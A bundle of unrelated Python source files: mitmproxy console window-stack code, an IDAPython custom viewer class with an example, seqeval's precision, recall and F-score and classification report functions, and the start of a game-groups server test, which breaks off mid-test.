keybindings = keybindings.KeyBindings(master),
options = options.Options(master),
help = help.HelpView(master),
eventlog = eventlog.EventLog(master),
edit_focus_query = grideditor.QueryEditor(master),
edit_focus_cookies = grideditor.CookieEditor(master),
edit_focus_setcookies = grideditor.SetCookieEditor(master),
edit_focus_setcookie_attrs = grideditor.CookieAttributeEditor(master),
edit_focus_multipart_form=grideditor.RequestMultipartEditor(master),
edit_focus_urlencoded_form=grideditor.RequestUrlEncodedEditor(master),
edit_focus_path = grideditor.PathEditor(master),
edit_focus_request_headers = grideditor.RequestHeaderEditor(master),
edit_focus_response_headers = grideditor.ResponseHeaderEditor(master),
)
self.stack = [base]
self.overlay = None
def set_overlay(self, o, **kwargs):
self.overlay = overlay.SimpleOverlay(
self, o, self.top_widget(), o.width, **kwargs,
)
def top_window(self):
"""
The current top window, ignoring overlays.
"""
return self.windows[self.stack[-1]]
def top_widget(self):
"""
The current top widget - either a window or the active overlay.
"""
if self.overlay:
return self.overlay
return self.top_window()
def push(self, wname):
if self.stack[-1] == wname:
return
prev = self.top_window()
self.stack.append(wname)
self.call("layout_pushed", prev)
def pop(self, *args, **kwargs):
"""
Pop off the stack, return True if we're already at the top.
"""
if not self.overlay and len(self.stack) == 1:
return True
self.call("layout_popping")
if self.overlay:
self.overlay = None
else:
self.stack.pop()
def call(self, name, *args, **kwargs):
"""
Call a function on both the top window, and the overlay if there is
one. If the widget has a key_responder, we call the function on the
responder instead.
"""
getattr(self.top_window(), name)(*args, **kwargs)
if self.overlay:
getattr(self.overlay, name)(*args, **kwargs)
class Window(urwid.Frame):
def __init__(self, master):
self.statusbar = statusbar.StatusBar(master)
super().__init__(
None,
header = None,
footer = urwid.AttrWrap(self.statusbar, "background")
)
self.master = master
self.master.view.sig_view_refresh.connect(self.view_changed)
self.master.view.sig_view_add.connect(self.view_changed)
self.master.view.sig_view_remove.connect(self.view_changed)
self.master.view.sig_view_update.connect(self.view_changed)
self.master.view.focus.sig_change.connect(self.view_changed)
self.master.view.focus.sig_change.connect(self.focus_changed)
signals.focus.connect(self.sig_focus)
signals.flow_change.connect(self.flow_changed)
signals.pop_view_state.connect(self.pop)
signals.push_view_state.connect(self.push)
self.master.options.subscribe(self.configure, ["console_layout"])
self.master.options.subscribe(self.configure, ["console_layout_headers"])
self.pane = 0
self.stacks = [
WindowStack(master, "flowlist"),
WindowStack(master, "eventlog")
]
def focus_stack(self):
return self.stacks[self.pane]
def configure(self, otions, updated):
self.refresh()
def refresh(self):
"""
Redraw the layout.
"""
c = self.master.options.console_layout
if c == "single":
self.pane = 0
def wrapped(idx):
widget = self.stacks[idx].top_widget()
if self.master.options.console_layout_headers:
title = self.stacks[idx].top_window().title
else:
title = None
return StackWidget(
self,
widget,
title,
self.pane == idx
)
w = None
if c == "single":
w = wrapped(0)
elif c == "vertical":
w = urwid.Pile(
[
wrapped(i) for i, s in enumerate(self.stacks)
],
focus_item=self.pane
)
else:
w = urwid.Columns(
[wrapped(i) for i, s in enumerate(self.stacks)],
dividechars=1,
focus_column=self.pane
)
self.body = urwid.AttrWrap(w, "background")
def flow_changed(self, sender, flow):
if self.master.view.focus.flow:
if flow.id == self.master.view.focus.flow.id:
self.focus_changed()
def focus_changed(self, *args, **kwargs):
"""
Triggered when the focus changes - either when it's modified, or
when it changes to a different flow altogether.
"""
for i in self.stacks:
i.call("focus_changed")
def view_changed(self, *args, **kwargs):
"""
Triggered when the view list has changed.
"""
for i in self.stacks:
i.call("view_changed")
def set_overlay(self, o, **kwargs):
"""
Set an overlay on the currently focused stack.
"""
self.focus_stack().set_overlay(o, **kwargs)
self.refresh()
def push(self, wname):
"""
Push a window onto the currently focused stack.
"""
self.focus_stack().push(wname)
self.refresh()
self.view_changed()
self.focus_changed()
def pop(self, *args, **kwargs):
"""
Pop a window from the currently focused stack. If there is only one
window on the stack, this prompts for exit.
"""
if self.focus_stack().pop():
self.master.prompt_for_exit()
else:
self.refresh()
self.view_changed()
self.focus_changed()
def stacks_sorted_by_focus(self):
"""
Returns:
self.stacks, with the focused stack first.
"""
stacks = self.stacks.copy()
stacks.insert(0, stacks.pop(self.pane))
return stacks
def current(self, keyctx):
"""
Returns the active widget with a matching key context, including overlays.
If multiple stacks have an active widget with a matching key context,
the currently focused stack is preferred.
"""
for s in self.stacks_sorted_by_focus():
t = s.top_widget()
if t.keyctx == keyctx:
return t
def current_window(self, keyctx):
"""
Returns the active window with a matching key context, ignoring overlays.
If multiple stacks have an active widget with a matching key context,
the currently focused stack is preferred.
"""
for s in self.stacks_sorted_by_focus():
t = s.top_window()
if t.keyctx == keyctx:
return t
def sig_focus(self, sender, section):
self.focus_position = section
def switch(self):
"""
Switch between the two panes.
"""
if self.master.options.console_layout == "single":
self.pane = 0
else:
self.pane = (self.pane + 1) % len(self.stacks)
self.refresh()
def mouse_event(self, *args, **kwargs):
# args: (size, event, button, col, row)
k = super().mouse_event(*args, **kwargs)
if not k:
if args[1] == "mouse drag":
signals.status_message.send(
message = "Hold down fn, shift, alt or ctrl to select text or use the --set console_mouse=false parameter.",
expire = 1
)
elif args[1] == "mouse press" and args[2] == 4:
self.keypress(args[0], "up")
elif args[1] == "mouse press" and args[2] == 5:
self.keypress(args[0], "down")
else:
return False
return True
def keypress(self, size, k):
k = super().keypress(size, k)
if k:
return self.master.keymap.handle(
self.focus_stack().top_widget().keyctx,
k
)
class Screen(urwid.raw_display.Screen):
def write(self, data):
if common.IS_WSL:
# replace urwid's SI/SO, which produce artifacts under WSL.
# at some point we may figure out what they actually do.
data = re.sub("[\x0e\x0f]", "", data)
super().write(data)
|
|
# -----------------------------------------------------------------------
# Standalone and testing code
import sys, struct
try:
import _idaapi
except:
print "Please try me from inside IDA"
sys.exit(0)
try:
import pywraps
pywraps_there = True
print "Using pywraps"
_idaapi.pyscv_init = pywraps.pyscv_init
_idaapi.pyscv_close = pywraps.pyscv_close
_idaapi.pyscv_add_line = pywraps.pyscv_add_line
_idaapi.pyscv_delete = pywraps.pyscv_delete
_idaapi.pyscv_refresh = pywraps.pyscv_refresh
_idaapi.pyscv_show = pywraps.pyscv_show
_idaapi.pyscv_clear_popup_menu = pywraps.pyscv_clear_popup_menu
_idaapi.pyscv_del_line = pywraps.pyscv_del_line
_idaapi.pyscv_get_pos = pywraps.pyscv_get_pos
_idaapi.pyscv_refresh_current = pywraps.pyscv_refresh_current
_idaapi.pyscv_get_current_line = pywraps.pyscv_get_current_line
_idaapi.pyscv_is_focused = pywraps.pyscv_is_focused
_idaapi.pyscv_add_popup_menu = pywraps.pyscv_add_popup_menu
_idaapi.pyscv_get_line = pywraps.pyscv_get_line
_idaapi.pyscv_jumpto = pywraps.pyscv_jumpto
_idaapi.pyscv_edit_line = pywraps.pyscv_edit_line
_idaapi.pyscv_patch_line = pywraps.pyscv_patch_line
_idaapi.pyscv_insert_line = pywraps.pyscv_insert_line
_idaapi.pyscv_count = pywraps.pyscv_count
_idaapi.pyscv_get_selection = pywraps.pyscv_get_selection
_idaapi.pyscv_clear_lines = pywraps.pyscv_clear_lines
_idaapi.pyscv_get_current_word = pywraps.pyscv_get_current_word
except:
pywraps_there = False
print "Not using pywraps"
# -----------------------------------------------------------------------
#<pycode(py_custviewer)>
class simplecustviewer_t(object):
"""The base class for implementing simple custom viewers"""
def __init__(self):
self.__this = None
def __del__(self):
"""Destructor. It also frees the associated C++ object"""
try:
_idaapi.pyscv_delete(self.__this)
except:
pass
@staticmethod
def __make_sl_arg(line, fgcolor=None, bgcolor=None):
return line if (fgcolor is None and bgcolor is None) else (line, fgcolor, bgcolor)
def Create(self, title):
"""
Creates the custom view. This should be the first method called after instantiation
@param title: The title of the view
@return: Boolean whether it succeeds or fails. It may fail if a window with the same title is already open.
In this case better close existing windows
"""
self.title = title
self.__this = _idaapi.pyscv_init(self, title)
return True if self.__this else False
def Close(self):
"""
Destroys the view.
One has to call Create() afterwards.
Show() can be called and it will call Create() internally.
@return: Boolean
"""
return _idaapi.pyscv_close(self.__this)
def Show(self):
"""
Shows an already created view. It the view was close, then it will call Create() for you
@return: Boolean
"""
return _idaapi.pyscv_show(self.__this)
def Refresh(self):
return _idaapi.pyscv_refresh(self.__this)
def RefreshCurrent(self):
"""Refreshes the current line only"""
return _idaapi.pyscv_refresh_current(self.__this)
def Count(self):
"""Returns the number of lines in the view"""
return _idaapi.pyscv_count(self.__this)
def GetSelection(self):
"""
Returns the selected area or None
@return:
- tuple(x1, y1, x2, y2)
- None if no selection
"""
return _idaapi.pyscv_get_selection(self.__this)
def ClearLines(self):
"""Clears all the lines"""
_idaapi.pyscv_clear_lines(self.__this)
def AddLine(self, line, fgcolor=None, bgcolor=None):
"""
Adds a colored line to the view
@return: Boolean
"""
return _idaapi.pyscv_add_line(self.__this, self.__make_sl_arg(line, fgcolor, bgcolor))
def InsertLine(self, lineno, line, fgcolor=None, bgcolor=None):
"""
Inserts a line in the given position
@return: Boolean
"""
return _idaapi.pyscv_insert_line(self.__this, lineno, self.__make_sl_arg(line, fgcolor, bgcolor))
def EditLine(self, lineno, line, fgcolor=None, bgcolor=None):
"""
Edits an existing line.
@return: Boolean
"""
return _idaapi.pyscv_edit_line(self.__this, lineno, self.__make_sl_arg(line, fgcolor, bgcolor))
def PatchLine(self, lineno, offs, value):
"""Patches an existing line character at the given offset. This is a low level function. You must know what you're doing"""
return _idaapi.pyscv_patch_line(self.__this, lineno, offs, value)
def DelLine(self, lineno):
"""
Deletes an existing line
@return: Boolean
"""
return _idaapi.pyscv_del_line(self.__this, lineno)
def GetLine(self, lineno):
"""
Returns a line
@param lineno: The line number
@return:
Returns a tuple (colored_line, fgcolor, bgcolor) or None
"""
return _idaapi.pyscv_get_line(self.__this, lineno)
def GetCurrentWord(self, mouse = 0):
"""
Returns the current word
@param mouse: Use mouse position or cursor position
@return: None if failed or a String containing the current word at mouse or cursor
"""
return _idaapi.pyscv_get_current_word(self.__this, mouse)
def GetCurrentLine(self, mouse = 0, notags = 0):
"""
Returns the current line.
@param mouse: Current line at mouse pos
@param notags: If True then tag_remove() will be called before returning the line
@return: Returns the current line (colored or uncolored) or None on failure
"""
return _idaapi.pyscv_get_current_line(self.__this, mouse, notags)
def GetPos(self, mouse = 0):
"""
Returns the current cursor or mouse position.
@param mouse: return mouse position
@return: Returns a tuple (lineno, x, y)
"""
return _idaapi.pyscv_get_pos(self.__this, mouse)
def GetLineNo(self, mouse = 0):
"""Calls GetPos() and returns the current line number or -1 on failure"""
r = self.GetPos(mouse)
return -1 if not r else r[0]
def Jump(self, lineno, x=0, y=0):
return _idaapi.pyscv_jumpto(self.__this, lineno, x, y)
def AddPopupMenu(self, title, hotkey=""):
"""
Adds a popup menu item
@param title: The name of the menu item
@param hotkey: Hotkey of the item or just empty
@return: Returns the
"""
return _idaapi.pyscv_add_popup_menu(self.__this, title, hotkey)
def ClearPopupMenu(self):
"""
Clears all previously installed popup menu items.
Use this function if you're generating menu items on the fly (in the OnPopup() callback),
and before adding new items
"""
_idaapi.pyscv_clear_popup_menu(self.__this)
def IsFocused(self):
"""Returns True if the current view is the focused view"""
return _idaapi.pyscv_is_focused(self.__this)
# Here are all the supported events
#<pydoc>
# def OnClick(self, shift):
# """
# User clicked in the view
# @param shift: Shift flag
# @return: Boolean. True if you handled the event
# """
# print "OnClick, shift=%d" % shift
# return True
#
# def OnDblClick(self, shift):
# """
# User dbl-clicked in the view
# @param shift: Shift flag
# @return: Boolean. True if you handled the event
# """
# print "OnDblClick, shift=%d" % shift
# return True
#
# def OnCursorPosChanged(self):
# """
# Cursor position changed.
# @return: Nothing
# """
# print "OnCurposChanged"
#
# def OnClose(self):
# """
# The view is closing. Use this event to cleanup.
# @return: Nothing
# """
# print "OnClose"
#
# def OnKeydown(self, vkey, shift):
# """
# User pressed a key
# @param vkey: Virtual key code
# @param shift: Shift flag
# @return: Boolean. True if you handled the event
# """
# print "OnKeydown, vk=%d shift=%d" % (vkey, shift)
# return False
#
# def OnPopup(self):
# """
# Context menu popup is about to be shown. Create items dynamically if you wish
# @return: Boolean. True if you handled the event
# """
# print "OnPopup"
#
# def OnHint(self, lineno):
# """
# Hint requested for the given line number.
# @param lineno: The line number (zero based)
# @return:
# - tuple(number of important lines, hint string)
# - None: if no hint available
# """
# return (1, "OnHint, line=%d" % lineno)
#
# def OnPopupMenu(self, menu_id):
# """
# A context (or popup) menu item was executed.
# @param menu_id: ID previously registered with add_popup_menu()
# @return: Boolean
# """
# print "OnPopupMenu, menu_id=" % menu_id
# return True
#</pydoc>
#</pycode(py_custviewer)>
#<pycode(py_custviewerex1)>
# -----------------------------------------------------------------------
class mycv_t(simplecustviewer_t):
def Create(self, sn=None):
# Form the title
title = "Simple custom view test"
if sn:
title += " %d" % sn
# Create the customviewer
if not simplecustviewer_t.Create(self, title):
return False
self.menu_hello = self.AddPopupMenu("Hello")
self.menu_world = self.AddPopupMenu("World")
for i in xrange(0, 100):
self.AddLine("Line %d" % i)
# self.Jump(0)
return True
def OnClick(self, shift):
"""
User clicked in the view
@param shift: Shift flag
@return: Boolean. True if you handled the event
"""
print "OnClick, shift=%d" % shift
return True
def OnDblClick(self, shift):
"""
User dbl-clicked in the view
@param shift: Shift flag
@return: Boolean. True if you handled the event
"""
word = self.GetCurrentWord()
if not word: word = "<None>"
print "OnDblClick, shift=%d, current word=%s" % (shift, word)
return True
def OnCursorPosChanged(self):
"""
Cursor position changed.
@return: Nothing
"""
print "OnCurposChanged"
def OnClose(self):
"""
The view is closing. Use this event to cleanup.
@return: Nothing
"""
print "OnClose " + self.title
def OnKeydown(self, vkey, shift):
"""
User pressed a key
@param vkey: Virtual key code
@param shift: Shift flag
@return: Boolean. True if you handled the event
"""
print "OnKeydown, vk=%d shift=%d" % (vkey, shift)
# ESCAPE?
if vkey == 27:
self.Close()
# VK_DELETE
elif vkey == 46:
n = self.GetLineNo()
if n is not None:
self.DelLine(n)
self.Refresh()
print "Deleted line %d" % n
# Goto?
elif vkey == ord('G'):
n = self.GetLineNo()
if n is not None:
v = idc.AskLong(self.GetLineNo(), "Where to go?")
if v:
self.Jump(v, 0, 5)
elif vkey == ord('R'):
print "refreshing...."
self.Refresh()
elif vkey == ord('C'):
print "refreshing current line..."
self.RefreshCurrent()
elif vkey == ord('A'):
s = idc.AskStr("NewLine%d" % self.Count(), "Append new line")
self.AddLine(s)
self.Refresh()
elif vkey == ord('X'):
print "Clearing all lines"
self.ClearLines()
self.Refresh()
elif vkey == ord('I'):
n = self.GetLineNo()
s = idc.AskStr("InsertedLine%d" % n, "Insert new line")
self.InsertLine(n, s)
self.Refresh()
elif vkey == ord('E'):
l = self.GetCurrentLine(notags=1)
if not l:
return False
n = self.GetLineNo()
print "curline=<%s>" % l
l = l + idaapi.COLSTR("*", idaapi.SCOLOR_VOIDOP)
self.EditLine(n, l)
self.RefreshCurrent()
print "Edited line %d" % n
else:
return False
return True
def OnPopup(self):
"""
Context menu popup is about to be shown. Create items dynamically if you wish
@return: Boolean. True if you handled the event
"""
print "OnPopup"
def OnHint(self, lineno):
"""
Hint requested for the given line number.
@param lineno: The line number (zero based)
@return:
- tuple(number of important lines, hint string)
- None: if no hint available
"""
return (1, "OnHint, line=%d" % lineno)
def OnPopupMenu(self, menu_id):
"""
A context (or popup) menu item was executed.
@param menu_id: ID previously registered with AddPopupMenu()
@return: Boolean
"""
print "OnPopupMenu, menu_id=%d" % menu_id
if menu_id == self.menu_hello:
print "Hello"
elif menu_id == self.menu_world:
print "World"
else:
# Unhandled
return False
return True
# -----------------------------------------------------------------------
try:
# created already?
mycv
print "Already created, will close it..."
mycv.Close()
del mycv
except:
pass
def show_win():
x = mycv_t()
if not x.Create():
print "Failed to create!"
return None
x.Show()
return x
mycv = show_win()
if not mycv:
del mycv
def make_many(n):
L = []
for i in xrange(1, n+1):
v = mycv_t()
if not v.Create(i):
break
v.Show()
L.append(v)
return L
#</pycode(py_custviewerex1)>
|
|
import warnings
from typing import Callable, List, Optional, Tuple, Type, Union
import numpy as np
from sklearn.exceptions import UndefinedMetricWarning
from seqeval.reporters import DictReporter, StringReporter
from seqeval.scheme import Entities, Token, auto_detect
PER_CLASS_SCORES = Tuple[List[float], List[float], List[float], List[int]]
AVERAGE_SCORES = Tuple[float, float, float, int]
SCORES = Union[PER_CLASS_SCORES, AVERAGE_SCORES]
def _prf_divide(numerator, denominator, metric,
modifier, average, warn_for, zero_division='warn'):
"""Performs division and handles divide-by-zero.
On zero-division, sets the corresponding result elements equal to
0 or 1 (according to ``zero_division``). Plus, if
``zero_division != "warn"`` raises a warning.
The metric, modifier and average arguments are used only for determining
an appropriate warning.
"""
mask = denominator == 0.0
denominator = denominator.copy()
denominator[mask] = 1 # avoid infs/nans
result = numerator / denominator
if not np.any(mask):
return result
# if ``zero_division=1``, set those with denominator == 0 equal to 1
result[mask] = 0.0 if zero_division in ['warn', 0] else 1.0
# the user will be removing warnings if zero_division is set to something
# different than its default value. If we are computing only f-score
# the warning will be raised only if precision and recall are ill-defined
if zero_division != 'warn' or metric not in warn_for:
return result
# build appropriate warning
# E.g. "Precision and F-score are ill-defined and being set to 0.0 in
# labels with no predicted samples. Use ``zero_division`` parameter to
# control this behavior."
if metric in warn_for and 'f-score' in warn_for:
msg_start = '{0} and F-score are'.format(metric.title())
elif metric in warn_for:
msg_start = '{0} is'.format(metric.title())
elif 'f-score' in warn_for:
msg_start = 'F-score is'
else:
return result
_warn_prf(average, modifier, msg_start, len(result))
return result
def _warn_prf(average, modifier, msg_start, result_size):
axis0, axis1 = 'sample', 'label'
if average == 'samples':
axis0, axis1 = axis1, axis0
msg = ('{0} ill-defined and being set to 0.0 {{0}} '
'no {1} {2}s. Use `zero_division` parameter to control'
' this behavior.'.format(msg_start, modifier, axis0))
if result_size == 1:
msg = msg.format('due to')
else:
msg = msg.format('in {0}s with'.format(axis1))
warnings.warn(msg, UndefinedMetricWarning, stacklevel=2)
def unique_labels(y_true: List[List[str]], y_pred: List[List[str]],
scheme: Type[Token], suffix: bool = False) -> List[str]:
sequences_true = Entities(y_true, scheme, suffix)
sequences_pred = Entities(y_pred, scheme, suffix)
unique_tags = sequences_true.unique_tags | sequences_pred.unique_tags
return sorted(unique_tags)
def check_consistent_length(y_true: List[List[str]], y_pred: List[List[str]]):
"""Check that all arrays have consistent first and second dimensions.
Checks whether all objects in arrays have the same shape or length.
Args:
y_true : 2d array.
y_pred : 2d array.
"""
len_true = list(map(len, y_true))
len_pred = list(map(len, y_pred))
is_list = set(map(type, y_true)) | set(map(type, y_pred))
if not is_list == {list}:
raise TypeError('Found input variables without list of list.')
if len(y_true) != len(y_pred) or len_true != len_pred:
message = 'Found input variables with inconsistent numbers of samples:\n{}\n{}'.format(len_true, len_pred)
raise ValueError(message)
def _precision_recall_fscore_support(y_true: List[List[str]],
y_pred: List[List[str]],
*,
average: Optional[str] = None,
warn_for=('precision', 'recall', 'f-score'),
beta: float = 1.0,
sample_weight: Optional[List[int]] = None,
zero_division: str = 'warn',
scheme: Optional[Type[Token]] = None,
suffix: bool = False,
extract_tp_actual_correct: Callable = None) -> SCORES:
if beta < 0:
raise ValueError('beta should be >=0 in the F-beta score')
average_options = (None, 'micro', 'macro', 'weighted')
if average not in average_options:
raise ValueError('average has to be one of {}'.format(average_options))
check_consistent_length(y_true, y_pred)
pred_sum, tp_sum, true_sum = extract_tp_actual_correct(y_true, y_pred, suffix, scheme)
if average == 'micro':
tp_sum = np.array([tp_sum.sum()])
pred_sum = np.array([pred_sum.sum()])
true_sum = np.array([true_sum.sum()])
# Finally, we have all our sufficient statistics. Divide! #
beta2 = beta ** 2
# Divide, and on zero-division, set scores and/or warn according to
# zero_division:
precision = _prf_divide(
numerator=tp_sum,
denominator=pred_sum,
metric='precision',
modifier='predicted',
average=average,
warn_for=warn_for,
zero_division=zero_division
)
recall = _prf_divide(
numerator=tp_sum,
denominator=true_sum,
metric='recall',
modifier='true',
average=average,
warn_for=warn_for,
zero_division=zero_division
)
# warn for f-score only if zero_division is warn, it is in warn_for
# and BOTH prec and rec are ill-defined
if zero_division == 'warn' and ('f-score',) == warn_for:
if (pred_sum[true_sum == 0] == 0).any():
_warn_prf(
average, 'true nor predicted', 'F-score is', len(true_sum)
)
# if tp == 0 F will be 1 only if all predictions are zero, all labels are
# zero, and zero_division=1. In all other case, 0
if np.isposinf(beta):
f_score = recall
else:
denom = beta2 * precision + recall
denom[denom == 0.] = 1 # avoid division by 0
f_score = (1 + beta2) * precision * recall / denom
# Average the results
if average == 'weighted':
weights = true_sum
if weights.sum() == 0:
zero_division_value = 0.0 if zero_division in ['warn', 0] else 1.0
# precision is zero_division if there are no positive predictions
# recall is zero_division if there are no positive labels
# fscore is zero_division if all labels AND predictions are
# negative
return (zero_division_value if pred_sum.sum() == 0 else 0.0,
zero_division_value,
zero_division_value if pred_sum.sum() == 0 else 0.0,
sum(true_sum))
elif average == 'samples':
weights = sample_weight
else:
weights = None
if average is not None:
precision = np.average(precision, weights=weights)
recall = np.average(recall, weights=weights)
f_score = np.average(f_score, weights=weights)
true_sum = sum(true_sum)
return precision, recall, f_score, true_sum
def precision_recall_fscore_support(y_true: List[List[str]],
y_pred: List[List[str]],
*,
average: Optional[str] = None,
warn_for=('precision', 'recall', 'f-score'),
beta: float = 1.0,
sample_weight: Optional[List[int]] = None,
zero_division: str = 'warn',
scheme: Optional[Type[Token]] = None,
suffix: bool = False,
**kwargs) -> SCORES:
"""Compute precision, recall, F-measure and support for each class.
Args:
y_true : 2d array. Ground truth (correct) target values.
y_pred : 2d array. Estimated targets as returned by a tagger.
beta : float, 1.0 by default
The strength of recall versus precision in the F-score.
average : string, [None (default), 'micro', 'macro', 'weighted']
If ``None``, the scores for each class are returned. Otherwise, this
determines the type of averaging performed on the data:
``'micro'``:
Calculate metrics globally by counting the total true positives,
false negatives and false positives.
``'macro'``:
Calculate metrics for each label, and find their unweighted
mean. This does not take label imbalance into account.
``'weighted'``:
Calculate metrics for each label, and find their average weighted
by support (the number of true instances for each label). This
alters 'macro' to account for label imbalance; it can result in an
F-score that is not between precision and recall.
warn_for : tuple or set, for internal use
This determines which warnings will be made in the case that this
function is being used to return only one of its metrics.
sample_weight : array-like of shape (n_samples,), default=None
Sample weights.
zero_division : "warn", 0 or 1, default="warn"
Sets the value to return when there is a zero division:
- recall: when there are no positive labels
- precision: when there are no positive predictions
- f-score: both
If set to "warn", this acts as 0, but warnings are also raised.
scheme : Token, [IOB2, IOE2, IOBES]
suffix : bool, False by default.
Returns:
precision : float (if average is not None) or array of float, shape = [n_unique_labels]
recall : float (if average is not None) or array of float, , shape = [n_unique_labels]
fbeta_score : float (if average is not None) or array of float, shape = [n_unique_labels]
support : int (if average is not None) or array of int, shape = [n_unique_labels]
The number of occurrences of each label in ``y_true``.
Examples:
>>> from seqeval.metrics.v1 import precision_recall_fscore_support
>>> from seqeval.scheme import IOB2
>>> y_true = [['O', 'O', 'O', 'B-MISC', 'I-MISC', 'I-MISC', 'O'], ['B-PER', 'I-PER', 'O']]
>>> y_pred = [['O', 'O', 'B-MISC', 'I-MISC', 'I-MISC', 'I-MISC', 'O'], ['B-PER', 'I-PER', 'O']]
>>> precision_recall_fscore_support(y_true, y_pred, average='macro', scheme=IOB2)
(0.5, 0.5, 0.5, 2)
>>> precision_recall_fscore_support(y_true, y_pred, average='micro', scheme=IOB2)
(0.5, 0.5, 0.5, 2)
>>> precision_recall_fscore_support(y_true, y_pred, average='weighted', scheme=IOB2)
(0.5, 0.5, 0.5, 2)
It is possible to compute per-label precisions, recalls, F1-scores and
supports instead of averaging:
>>> precision_recall_fscore_support(y_true, y_pred, average=None, scheme=IOB2)
(array([0., 1.]), array([0., 1.]), array([0., 1.]), array([1, 1]))
Notes:
When ``true positive + false positive == 0``, precision is undefined;
When ``true positive + false negative == 0``, recall is undefined.
In such cases, by default the metric will be set to 0, as will f-score,
and ``UndefinedMetricWarning`` will be raised. This behavior can be
modified with ``zero_division``.
"""
def extract_tp_actual_correct(y_true, y_pred, suffix, scheme):
# If this function is called from classification_report,
# try to reuse entities to optimize the function.
entities_true = kwargs.get('entities_true') or Entities(y_true, scheme, suffix)
entities_pred = kwargs.get('entities_pred') or Entities(y_pred, scheme, suffix)
target_names = sorted(entities_true.unique_tags | entities_pred.unique_tags)
tp_sum = np.array([], dtype=np.int32)
pred_sum = np.array([], dtype=np.int32)
true_sum = np.array([], dtype=np.int32)
for type_name in target_names:
entities_true_type = entities_true.filter(type_name)
entities_pred_type = entities_pred.filter(type_name)
tp_sum = np.append(tp_sum, len(entities_true_type & entities_pred_type))
pred_sum = np.append(pred_sum, len(entities_pred_type))
true_sum = np.append(true_sum, len(entities_true_type))
return pred_sum, tp_sum, true_sum
precision, recall, f_score, true_sum = _precision_recall_fscore_support(
y_true, y_pred,
average=average,
warn_for=warn_for,
beta=beta,
sample_weight=sample_weight,
zero_division=zero_division,
scheme=scheme,
suffix=suffix,
extract_tp_actual_correct=extract_tp_actual_correct
)
return precision, recall, f_score, true_sum
def classification_report(y_true: List[List[str]],
y_pred: List[List[str]],
*,
sample_weight: Optional[List[int]] = None,
digits: int = 2,
output_dict: bool = False,
zero_division: str = 'warn',
suffix: bool = False,
scheme: Type[Token] = None) -> Union[str, dict]:
"""Build a text report showing the main tagging metrics.
Args:
y_true : 2d array. Ground truth (correct) target values.
y_pred : 2d array. Estimated targets as returned by a classifier.
sample_weight : array-like of shape (n_samples,), default=None
Sample weights.
digits : int. Number of digits for formatting output floating point values.
output_dict : bool(default=False). If True, return output as dict else str.
zero_division : "warn", 0 or 1, default="warn"
Sets the value to return when there is a zero division:
- recall: when there are no positive labels
- precision: when there are no positive predictions
- f-score: both
If set to "warn", this acts as 0, but warnings are also raised.
scheme : Token, [IOB2, IOE2, IOBES]
suffix : bool, False by default.
Returns:
report : string/dict. Summary of the precision, recall, F1 score for each class.
Examples:
>>> from seqeval.metrics.v1 import classification_report
>>> y_true = [['O', 'O', 'O', 'B-MISC', 'I-MISC', 'I-MISC', 'O'], ['B-PER', 'I-PER', 'O']]
>>> y_pred = [['O', 'O', 'B-MISC', 'I-MISC', 'I-MISC', 'I-MISC', 'O'], ['B-PER', 'I-PER', 'O']]
>>> print(classification_report(y_true, y_pred))
precision recall f1-score support
<BLANKLINE>
MISC 0.00 0.00 0.00 1
PER 1.00 1.00 1.00 1
<BLANKLINE>
micro avg 0.50 0.50 0.50 2
macro avg 0.50 0.50 0.50 2
weighted avg 0.50 0.50 0.50 2
<BLANKLINE>
"""
check_consistent_length(y_true, y_pred)
if scheme is None or not issubclass(scheme, Token):
scheme = auto_detect(y_true, suffix)
entities_true = Entities(y_true, scheme, suffix)
entities_pred = Entities(y_pred, scheme, suffix)
target_names = sorted(entities_true.unique_tags | entities_pred.unique_tags)
if output_dict:
reporter = DictReporter()
else:
name_width = max(map(len, target_names))
avg_width = len('weighted avg')
width = max(name_width, avg_width, digits)
reporter = StringReporter(width=width, digits=digits)
# compute per-class scores.
p, r, f1, s = precision_recall_fscore_support(
y_true, y_pred,
average=None,
sample_weight=sample_weight,
zero_division=zero_division,
scheme=scheme,
suffix=suffix,
entities_true=entities_true,
entities_pred=entities_pred
)
for row in zip(target_names, p, r, f1, s):
reporter.write(*row)
reporter.write_blank()
# compute average scores.
average_options = ('micro', 'macro', 'weighted')
for average in average_options:
avg_p, avg_r, avg_f1, support = precision_recall_fscore_support(
y_true, y_pred,
average=average,
sample_weight=sample_weight,
zero_division=zero_division,
scheme=scheme,
suffix=suffix,
entities_true=entities_true,
entities_pred=entities_pred
)
reporter.write('{} avg'.format(average), avg_p, avg_r, avg_f1, support)
reporter.write_blank()
return reporter.report()
|
|
from tornado.gen import multi
from tornado.testing import gen_test
from .. server import SocialServer
from .. model.group import GroupFlags, GroupJoinMethod, GroupError, GroupsModel
from .. model.request import NoSuchRequest
from anthill.common import testing
from .. import options as _opts
class GroupsTestCase(testing.ServerTestCase):
GAMESPACE_ID = 1
ACCOUNT_A = 1
ACCOUNT_B = 2
ACCOUNT_C = 3
ACCOUNT_D = 4
@classmethod
def need_test_db(cls):
return True
@classmethod
def get_server_instance(cls, db=None):
return SocialServer(db)
@gen_test
async def test_group_create(self):
group_id = await self.application.groups.create_group(
GroupsTestCase.GAMESPACE_ID, {}, GroupFlags([]),
GroupJoinMethod(GroupJoinMethod.FREE), 50, GroupsTestCase.ACCOUNT_A, {})
self.assertGreater(group_id, 0, "New group ID must be positive")
@gen_test
async def test_free_join(self):
group_id = await self.application.groups.create_group(
GroupsTestCase.GAMESPACE_ID, {}, GroupFlags([]),
GroupJoinMethod(GroupJoinMethod.FREE), 50, GroupsTestCase.ACCOUNT_A, {"test": "a"})
members = await self.application.groups.list_group_participants(GroupsTestCase.GAMESPACE_ID, group_id)
self.assertEquals(len(members), 1, "Group should have one member from scratch")
self.assertEquals(members[0].account, GroupsTestCase.ACCOUNT_A, "Member should be ACCOUNT_A")
self.assertEquals(members[0].role, GroupsModel.MAXIMUM_ROLE, "Member role should be max")
await self.application.groups.join_group(GroupsTestCase.GAMESPACE_ID, group_id,
GroupsTestCase.ACCOUNT_B, {"test": "b"})
members = await self.application.groups.list_group_participants(GroupsTestCase.GAMESPACE_ID, group_id)
members = {
member.account: member
for member in members
}
self.assertEquals(len(members), 2, "After group join there should be two members")
self.assertEquals(members[GroupsTestCase.ACCOUNT_A].profile, {"test": "a"})
self.assertEquals(members[GroupsTestCase.ACCOUNT_B].profile, {"test": "b"})
self.assertEquals(members[GroupsTestCase.ACCOUNT_B].role, GroupsModel.MINIMUM_ROLE,
"Free member role should be min")
@gen_test
async def test_same_join(self):
group_id = await self.application.groups.create_group(
GroupsTestCase.GAMESPACE_ID, {}, GroupFlags([]),
